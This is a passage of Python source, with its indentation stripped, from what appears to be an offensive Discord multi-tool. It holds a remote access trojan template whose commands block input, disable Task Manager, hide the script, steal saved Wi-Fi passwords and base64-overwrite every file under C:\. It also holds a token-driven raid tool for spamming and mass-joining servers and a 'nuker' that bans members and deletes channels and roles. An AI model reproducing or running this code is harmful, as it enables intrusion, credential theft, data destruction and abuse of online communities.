import ctypes
WM_SYSCOMMAND = 274
HWND_BROADCAST = 65535
SC_MONITORPOWER = 61808
ctypes.windll.user32.BlockInput(True)
ctypes.windll.user32.SendMessageW(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, 2)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!displayon":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
from pynput.keyboard import Key, Controller
keyboard = Controller()
keyboard.press(Key.esc)
keyboard.release(Key.esc)
keyboard.press(Key.esc)
keyboard.release(Key.esc)
ctypes.windll.user32.BlockInput(False)
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[!] Admin rights are required for this operation")
if message.content == "!hide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system(\"""attrib +h "{}" \""".format(cmd237))
await message.channel.send("[*] Command successfuly executed")
if message.content == "!unhide":
import os
import inspect
cmd237 = inspect.getframeinfo(inspect.currentframe()).filename
os.system(\"""attrib -h "{}" \""".format(cmd237))
await message.channel.send("[*] Command successfuly executed")
#broken. might fix if someone want me too.
if message.content == "!decode" or message.content == "!encode":
import os
import base64
def encode(file):
f = open(file)
data = f.read()
f.close()
data = data.encode("utf-8")
encodedBytes = base64.b64encode(data)
os.remove(file)
file = file + '.rip'
t = open(file, "w+")
encodedBytes = encodedBytes.decode("utf-8")
t.write(encodedBytes)
t.close()
def decode(file):
f = open(file)
data = f.read()
f.close()
data = data.encode("utf-8")
decodedBytes = base64.b64decode(data)
os.remove(file)
file = file.replace('.rip', '')
t = open(file, "w+")
decodedBytes = decodedBytes.decode("utf-8")
t.write(decodedBytes)
t.close()
parentDirectory = 'C:\\\\'
for root, dirs, files in os.walk(parentDirectory):
for afile in files:
full_path = os.path.join(root, afile)
if message.content == "!encode":
encode(full_path)
await message.channel.send("[*] Command successfuly executed")
if message.content == ('!decode') and full_path.endswith('.rip'):
decode(full_path)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!ejectcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door open', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!retractcd":
import ctypes
return ctypes.windll.WINMM.mciSendStringW(u'set cdaudio door closed', None, 0, None)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!critproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
critproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content == "!uncritproc":
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
uncritproc()
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send(r"[*] Not admin :(")
if message.content.startswith("!website"):
import subprocess
website = message.content[9:]
def OpenBrowser(URL):
if not URL.startswith('http'):
URL = 'http://' + URL
subprocess.call('start ' + URL, shell=True)
OpenBrowser(website)
await message.channel.send("[*] Command successfuly executed")
if message.content == "!distaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statuuusss
import time
statuuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statuuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
import winreg as reg
reg.CreateKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
else:
import os
os.system('powershell New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "DisableTaskMgr" -Value "1" -Force')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!enbtaskmgr":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
global statusuusss
import time
statusuusss = None
import subprocess
import os
instruction = r'reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"'
def shell():
output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
global status
statusuusss = "ok"
return output
import threading
shel = threading.Thread(target=shell)
shel._running = True
shel.start()
time.sleep(1)
shel._running = False
result = str(shell().stdout.decode('CP437'))
if len(result) <= 5:
await message.channel.send("[*] Command successfuly executed")
else:
import winreg as reg
reg.DeleteKey(reg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
await message.channel.send("[*] Command successfuly executed")
else:
await message.channel.send("[*] This command requires admin privileges")
if message.content == "!getwifipass":
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import ctypes
import os
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == True:
import os
import subprocess
import json
x = subprocess.run("NETSH WLAN SHOW PROFILE", stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
x = x[x.find("User profiles\\r\\n-------------\\r\\n")+len("User profiles\\r\\n-------------\\r\\n"):len(x)].replace('\\r\\n\\r\\n"',"").replace('All User Profile', r'"All User Profile"')[4:]
lst = []
done = []
for i in x.splitlines():
i = i.replace('"All User Profile" : ',"")
b = -1
while True:
b = b + 1
if i.startswith(" "):
i = i[1:]
if b >= len(i):
break
lst.append(i)
lst.remove('')
for e in lst:
output = subprocess.run('NETSH WLAN SHOW PROFILE "' + e + '" KEY=CLEAR ', stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.decode('CP437')
for i in output.splitlines():
if i.find("Key Content") != -1:
ok = i[4:].replace("Key Content : ","")
break
almoast = '"' + e + '"' + ":" + '"' + ok + '"'
done.append(almoast)
await message.channel.send("[*] Command successfuly executed")
await message.channel.send(done)
else:
await message.channel.send("[*] This command requires admin privileges")
client.run(token)""".replace("~~TOKENHERE~~", tokenbot))
except Exception as e:
print(f"""\t[!] Error writing file: {e}""")
main()
print(f"""\t[!] File has been correctly written to "temp/{fileName}.py" \n""")
main()
discordrat()
elif choice == "raid":
ur = 'https://discord.com/api/v9/channels/messages'
if not os.path.exists('tokens.txt'):
fichier = open("tokens.txt", "a")
fichier.close
verif = input("""\t[#] Write your tokens in the file "tokens.txt" then ENTER to launch the raid""")
tokens = open('tokens.txt', 'r').read().splitlines()
print()
def randstr(lenn):
alpha = "abcdefghijklmnopqrstuvwxyz0123456789"
text = ''
for i in range(0, lenn):
text += alpha[random.randint(0, len(alpha) - 1)]
return text
def spammer():
tokens = open('tokens.txt', 'r').read().splitlines()
choiceraid = input(f""" {username}\\servraider> """)
if choiceraid == 'spam':
tokens = open("tokens.txt", "r").read().splitlines()
channel = input(f'\t[+] Channel ID: ')
mess = input(f'\t[+] Message: ')
delay = float(input(f'\t[+] Delay: '))
ch = input('\t[+] Do you want append random string (Yes | No)? ').lower()
def spam(token, mess):
if ch == 'yes':
mess += " | " + "".join(random.choices(string.ascii_lowercase + string.digits, k=5))
else:
pass
url = 'https://discord.com/api/v9/channels/' + channel + '/messages'
payload = {"content": mess, "tts": False}
header = {"authorization": token,
"accept": "*/*",
"accept-language": "en-GB",
"content-length": "90",
"content-type": "application/json",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.9003 Chrome/91.0.4472.164 Electron/13.4.0 Safari/537.36",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjI0NjMiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6InNrIiwiY2xpZW50X2J1aWxkX251bWJlciI6OTkwMTYsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
}
while True:
time.sleep(delay)
src = requests.post(url, headers=header, json=payload)
if src.status_code == 429:
ratelimit = json.loads(src.content)
print(f"\t\t[!] Ratelimit for", str(float(ratelimit['retry_after'])) + " seconds")
time.sleep(float(ratelimit['retry_after']))
elif src.status_code == 200:
print(f'\t\t[!] {mess} sent')
elif src.status_code == 401:
print(f'\t\t[!] Invalid token')
elif src.status_code == 404:
print(f'\t\t[!] Not found')
elif src.status_code == 403:
print(f'\t\t[!] Token havent got access to this channel')
def thread():
text = mess
for token in tokens:
threading.Thread(target=spam, args=(token, text)).start()
start = input(f'\t[#] Press any key to start')
start = thread()
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'dmspam':
def DMSpammer(idd, message, token):
header = {
'Authorization': token,
"accept": "*/*",
"accept-language": "en-GB",
"content-length": "90",
"content-type": "application/json",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.9003 Chrome/91.0.4472.164 Electron/13.4.0 Safari/537.36",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjI0NjMiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6InNrIiwiY2xpZW50X2J1aWxkX251bWJlciI6OTkwMTYsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
}
payload = {'recipient_id': idd}
r1 = requests.post(f'https://discordapp.com/api/v9/users/@me/channels', headers=header,
json=payload)
if chrr == 'yes':
message += " | " + "".join(random.choices(string.ascii_lowercase + string.digits, k=5))
elif chrr == 'no':
pass
else:
pass
payload = {"content": message, "tts": False}
j = json.loads(r1.content)
while True:
r2 = requests.post(f"https://discordapp.com/api/v9/channels/{j['id']}/messages",
headers=header, json=payload)
if r2.status_code == 429:
ratelimit = json.loads(r2.content)
print(f"\t\t[!] Ratelimit for", str(float(ratelimit['retry_after'])) + " seconds")
time.sleep(float(ratelimit['retry_after']))
elif r2.status_code == 200:
print(f"[+] DM sent to {idd}!")
tokens = open("tokens.txt", "r").read().splitlines()
user = input(f"\t[+] User ID: ")
message = input(f"\t[+] Message: ")
chrr = input('\t[+] Do you want append random string (Yes | No)? ').lower()
def thread():
for token in tokens:
threading.Thread(target=DMSpammer, args=(user, message, token)).start()
start = input(f'\t[#] Press enter to start')
start = thread()
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'fspam':
def friender(token, user):
try:
user = user.split("#")
headers = {
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-GB",
"authorization": token,
"content-length": "90",
"content-type": "application/json",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.9003 Chrome/91.0.4472.164 Electron/13.4.0 Safari/537.36",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjI0NjMiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6InNrIiwiY2xpZW50X2J1aWxkX251bWJlciI6OTkwMTYsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
}
payload = {"username": user[0], "discriminator": user[1]}
src = requests.post('https://discord.com/api/v9/users/@me/relationships', headers=headers,
json=payload)
if src.status_code == 204:
print(f"\t\t[!] Friend request sent to {user[0]}#{user[1]}!")
except Exception as e:
print(e)
user = input(f"\t[+] Put Username#Tag: ")
tokens = open("tokens.txt", "r").read().splitlines()
delay = float(input(f'\t[+] Delay: '))
for token in tokens:
time.sleep(delay)
threading.Thread(target=friender, args=(token, user)).start()
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'rspam':
def reaction(chd, iddd, start, org, token):
headers = {'Content-Type': 'application/json',
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US',
'Cookie': f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
'DNT': '1',
'origin': 'https://discord.com',
'TE': 'Trailers',
'X-Super-Properties': 'eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAxIiwib3NfdmVyc2lvbiI6IjEwLjAuMTkwNDIiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6ODMwNDAsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9',
'authorization': token,
'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'
}
emoji = ej.emojize(org, use_aliases=True)
if start == '':
a = requests.put(
f"https://discordapp.com/api/v9/channels/{chd}/messages/{iddd}/reactions/{emoji}/@me",
headers=headers)
if a.status_code == 204:
print(f"\t\t[!] Reaction {org} added! ")
else:
print(f"\t\t[!] Error")
else:
print(f'\t\t[!] ERROR, press only ENTER')
tokens = open('tokens.txt', 'r').read().splitlines()
chd = input('\t[+] Channel ID: ')
iddd = input('\t[+] Message ID: ')
emoji = input('\t[+] Emoji: ')
start = input("\t[#] Press ENTER to start")
for token in tokens:
threading.Thread(target=reaction, args=(chd, iddd, start, emoji, token)).start()
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'tspam':
message = input("\t[+] Message: ")
amount = int(input("\t[+] Amount of messages: "))
delay = float(input('\t[+] Delay: '))
print(f"\t[+] 10 seconds to typing spam")
for seconds in range(10, 0, -1):
print(seconds)
time.sleep(1)
print(f'\t[#] Spamming...')
for i in range(0, amount):
if message != "":
pyautogui.typewrite(message)
pyautogui.press("enter")
else:
pyautogui.hotkey("ctrl", "v")
pyautogui.press("enter")
print(f'\t\t[!] {message} sent')
time.sleep(delay)
print(f'\t[#] Successfully spam guild\n')
spammer()
elif choiceraid == 'join':
http.client._is_legal_header_name = re.compile(rb'[^\s][^:\r\n]*').fullmatch
tokens = open("tokens.txt", "r").read().splitlines()
def join(invite, token):
token = token.replace("\r", "")
token = token.replace("\n", "")
headers = {
":authority": "discord.com",
":method": "POST",
":path": "/api/v9/invites/" + invite,
":scheme": "https",
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US",
"Authorization": token,
"content-length": "0",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.600 Chrome/91.0.4472.106 Electron/13.1.4 Safari/537.36",
"x-context-properties": "eyJsb2NhdGlvbiI6Ikludml0ZSBCdXR0b24gRW1iZWQiLCJsb2NhdGlvbl9ndWlsZF9pZCI6Ijg3OTc4MjM4MDAxMTk0NjAyNCIsImxvY2F0aW9uX2NoYW5uZWxfaWQiOiI4ODExMDg4MDc5NjE0MTk3OTYiLCJsb2NhdGlvbl9jaGFubmVsX3R5cGUiOjAsImxvY2F0aW9uX21lc3NhZ2VfaWQiOiI4ODExOTkzOTI5MTExNTkzNTcifQ==",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJjYW5hcnkiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC42MDAiLCJvc192ZXJzaW9uIjoiMTAuMC4yMjAwMCIsIm9zX2FyY2giOiJ4NjQiLCJzeXN0ZW1fbG9jYWxlIjoic2siLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo5NTM1MywiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
}
rrr = requests.post("https://discordapp.com/api/v9/invites/" + invite, headers=headers)
if rrr.status_code == 204 or 200:
print(f'\t\t[!] Done')
else:
print('\t\t[!] Error')
invite = input(f"\t[+] Discord server invite: ")
invite = invite.replace("https://discord.gg/", "")
invite = invite.replace("discord.gg/", "")
invite = invite.replace("https://discord.com/invite/", "")
delay = float(input(f'\t[+] Delay: '))
for token in tokens:
time.sleep(delay)
threading.Thread(target=join, args=(invite, token)).start()
time.sleep(3)
b = input('\t[+] Do you want to bypass member screening (Yes | No)? ')
if b == 'yes':
headers = {
":authority": "discord.com",
":method": "POST",
":path": "/api/v9/invites/" + invite,
":scheme": "https",
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US",
"Authorization": token,
"content-length": "0",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.600 Chrome/91.0.4472.106 Electron/13.1.4 Safari/537.36",
"x-context-properties": "eyJsb2NhdGlvbiI6Ikludml0ZSBCdXR0b24gRW1iZWQiLCJsb2NhdGlvbl9ndWlsZF9pZCI6Ijg3OTc4MjM4MDAxMTk0NjAyNCIsImxvY2F0aW9uX2NoYW5uZWxfaWQiOiI4ODExMDg4MDc5NjE0MTk3OTYiLCJsb2NhdGlvbl9jaGFubmVsX3R5cGUiOjAsImxvY2F0aW9uX21lc3NhZ2VfaWQiOiI4ODExOTkzOTI5MTExNTkzNTcifQ==",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJjYW5hcnkiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC42MDAiLCJvc192ZXJzaW9uIjoiMTAuMC4yMjAwMCIsIm9zX2FyY2giOiJ4NjQiLCJzeXN0ZW1fbG9jYWxlIjoic2siLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo5NTM1MywiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
}
def bps(invite_code, guild_id):
vur = f"https://discord.com/api/v9/guilds/{guild_id}/member-verification?with_guild=false&invite_code=" + invite_code
rr = requests.get(vur, headers=headers).json()
data = {}
data['version'] = rr['version']
data['form_fields'] = rr['form_fields']
data['form_fields'][0]['response'] = True
fv = f"https://discord.com/api/v9/guilds/{str(guild_id)}/requests/@me"
requests.put(fv, headers=headers, json=data)
sID = input('\t[+]Server ID: ')
tokens = open('tokens.txt', 'r').read().splitlines()
for token in tokens:
threading.Thread(target=bps, args=(invite, sID)).start()
elif b == 'no':
pass
print(f'\t[#] Successfully join guild\n')
spammer()
elif choiceraid == 'leave':
token = open("tokens.txt", "r").read().splitlines()
ID = input(f'\t[+] Guild ID: ')
apilink = "https://discordapp.com/api/v9/users/@me/guilds/" + str(ID)
with open('tokens.txt', 'r') as handle:
tokens = handle.readlines()
for i in tokens:
token = i.rstrip()
headers = {
'Authorization': token,
"content-length": "0",
"cookie": f"__cfuid={randstr(43)}; __dcfduid={randstr(32)}; locale=en-US",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.600 Chrome/91.0.4472.106 Electron/13.1.4 Safari/537.36",
"x-context-properties": "eyJsb2NhdGlvbiI6Ikludml0ZSBCdXR0b24gRW1iZWQiLCJsb2NhdGlvbl9ndWlsZF9pZCI6Ijg3OTc4MjM4MDAxMTk0NjAyNCIsImxvY2F0aW9uX2NoYW5uZWxfaWQiOiI4ODExMDg4MDc5NjE0MTk3OTYiLCJsb2NhdGlvbl9jaGFubmVsX3R5cGUiOjAsImxvY2F0aW9uX21lc3NhZ2VfaWQiOiI4ODExOTkzOTI5MTExNTkzNTcifQ==",
"x-debug-options": "bugReporterEnabled",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJjYW5hcnkiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC42MDAiLCJvc192ZXJzaW9uIjoiMTAuMC4yMjAwMCIsIm9zX2FyY2giOiJ4NjQiLCJzeXN0ZW1fbG9jYWxlIjoic2siLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo5NTM1MywiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
}
requests.delete(apilink, headers=headers)
print(f'\t[#] Successfully left guild\n')
spammer()
elif choiceraid == 'exit':
print()
main()
elif choiceraid == 'help':
print(f"""\n\tTool Command\tDescription\n\t------------\t-----------\n\tspam\t\tSpammer\n\tdmspam\t\tDM Spammer\n\tfspam\t\tFriends Spammer\n\trspam\t\tReactions Spammer\n\ttspam\t\tTypings Spammer\n\tjoin\t\tJoiner\n\tleave\t\tLeaver\n""")
spammer()
elif choiceraid == 'reset':
reset()
spammer()
else:
print(f"""\tInvalid command\n""")
spammer()
spammer()
elif choice == "servnuker":
token = input(f"""\t[+] Enter the token of the bot you will use to execute the RAID commands: """)
print()
def check_token():
if requests.get("https://discord.com/api/v8/users/@me", headers={"Authorization": f'{token}'}).status_code == 200:
return "user"
else:
return "bot"
import discord
token_type = check_token()
intents = discord.Intents.all()
intents.members = True
if token_type == "user":
headers = {'Authorization': f'{token}'}
client = commands.Bot(command_prefix=">", case_insensitive=False, self_bot=True, intents=intents)
elif token_type == "bot":
headers = {'Authorization': f'Bot {token}'}
client = commands.Bot(command_prefix=">", case_insensitive=False, intents=intents)
client.remove_command("help")
if not os.path.exists('Scraped'):
os.makedirs('Scraped')
fichier = open("Scraped/members.txt", "a")
fichier.close
fichier = open("Scraped/channels.txt", "a")
fichier.close
fichier = open("Scraped/roles.txt", "a")
fichier.close
class Nuker:
def BanMembers(self, guild, member):
while True:
r = requests.put(f"https://discord.com/api/v8/guilds/{guild}/bans/{member}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Banned {member.strip()}\n")
break
else:
break
def KickMembers(self, guild, member):
while True:
r = requests.delete(f"https://discord.com/api/v8/guilds/{guild}/members/{member}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Kicked {member.strip()}\n")
break
else:
break
def DeleteChannels(self, guild, channel):
while True:
r = requests.delete(f"https://discord.com/api/v8/channels/{channel}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Deleted Channel {channel.strip()}\n")
break
else:
break
def DeleteRoles(self, guild, role):
while True:
r = requests.delete(f"https://discord.com/api/v8/guilds/{guild}/roles/{role}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Deleted Role {role.strip()}\n")
break
else:
break
def SpamChannels(self, guild, name):
while True:
json = {'name': name, 'type': 0}
r = requests.post(f'https://discord.com/api/v8/guilds/{guild}/channels', headers=headers, json=json)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Created Channel {name}\n")
break
else:
break
def SpamRoles(self, guild, name):
while True:
json = {'name': name}
r = requests.post(f'https://discord.com/api/v8/guilds/{guild}/roles', headers=headers, json=json)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Created Role {name}\n")
break
else:
break
async def Scrape(self):
guild = input(f'\t[+] Guild ID: ')
await client.wait_until_ready()
guildOBJ = client.get_guild(int(guild))
members = await guildOBJ.chunk()
try:
os.remove("Scraped/members.txt")
os.remove("Scraped/channels.txt")
os.remove("Scraped/roles.txt")
except:
pass
membercount = 0
with open('Scraped/members.txt', 'a') as m:
for member in members:
m.write(str(member.id) + "\n")
membercount += 1
print(f"\t[#] Scraped {membercount} Members")
m.close()
channelcount = 0
with open('Scraped/channels.txt', 'a') as c:
for channel in guildOBJ.channels:
c.write(str(channel.id) + "\n")
channelcount += 1
print(f"\t[#] Scraped {channelcount} Channels")
c.close()
rolecount = 0
with open('Scraped/roles.txt', 'a') as r:
for role in guildOBJ.roles:
r.write(str(role.id) + "\n")
rolecount += 1
print(f"\t[#] Scraped {rolecount} Roles\n")
r.close()
async def NukeExecute(self):
guild = input(f'\t[+] Guild ID: ')
channel_name = input(f"\t[+] Channel Names: ")
channel_amount = input(f"\t[+] Channel Amount: ")
role_name = input(f"\t[+] Role Names: ")
role_amount = input(f"\t[+] Role Amount: ")
members = open('Scraped/members.txt')
channels = open('Scraped/channels.txt')
roles = open('Scraped/roles.txt')
for member in members:
threading.Thread(target=self.BanMembers, args=(guild, member,)).start()
for channel in channels:
threading.Thread(target=self.DeleteChannels, args=(guild, channel,)).start()
for role in roles:
threading.Thread(target=self.DeleteRoles, args=(guild, role,)).start()
for i in range(int(channel_amount)):
threading.Thread(target=self.SpamChannels, args=(guild, channel_name,)).start()
for i in range(int(role_amount)):
threading.Thread(target=self.SpamRoles, args=(guild, role_name,)).start()
members.close()
channels.close()
roles.close()
async def BanExecute(self):
guild = input(f'\t[+] Guild ID: ')
members = open('Scraped/members.txt')
for member in members:
threading.Thread(target=self.BanMembers, args=(guild, member,)).start()
members.close()
async def KickExecute(self):
guild = input(f'\t[+] Guild ID: ')
members = open('Scraped/members.txt')
for member in members:
threading.Thread(target=self.KickMembers, args=(guild, member,)).start()
members.close()
async def ChannelDeleteExecute(self):
guild = input(f'\t[+] Guild ID: ')
channels = open('Scraped/channels.txt')
for channel in channels:
threading.Thread(target=self.DeleteChannels, args=(guild, channel,)).start()
channels.close()
async def RoleDeleteExecute(self):
guild = input(f'\t[+] Guild ID: ')
roles = open('Scraped/roles.txt')
for role in roles:
threading.Thread(target=self.DeleteRoles, args=(guild, role,)).start()
roles.close()
async def ChannelSpamExecute(self):
guild = input(f'\t[+] Guild ID: ')
name = input(f"\t[+] Channel Names: ")
amount = input(f"\t[+] Amount: ")
for i in range(int(amount)):
threading.Thread(target=self.SpamChannels, args=(guild, name,)).start()
async def RoleSpamExecute(self):
guild = input(f'\t[+] Guild ID: ')
name = input(f"\t[+] Role Names: ")
amount = input(f"\t[+] Amount: ")
for i in range(int(amount)):
threading.Thread(target=self.SpamRoles, args=(guild, name,)).start()
async def PruneMembers(self):
guild = input(f'\t[+] Guild ID: ')
await guild.prune_members(days=1, compute_prune_count=False, roles=guild.roles)
async def Menu(self):
choicenuker = input(f""" {username}\\servnuker> """)
if choicenuker == 'ban':
await self.BanExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'kick':
await self.KickExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'prune':
await self.PruneMembers()
time.sleep(2)
await self.Menu()
elif choicenuker == 'dedlrole':
await self.RoleDeleteExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'delchannels':
await self.ChannelDeleteExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'croles':
await self.RoleSpamExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'cchannels':
await self.ChannelSpamExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'nuke':
await self.NukeExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'scrape':
await self.Scrape()
time.sleep(3)
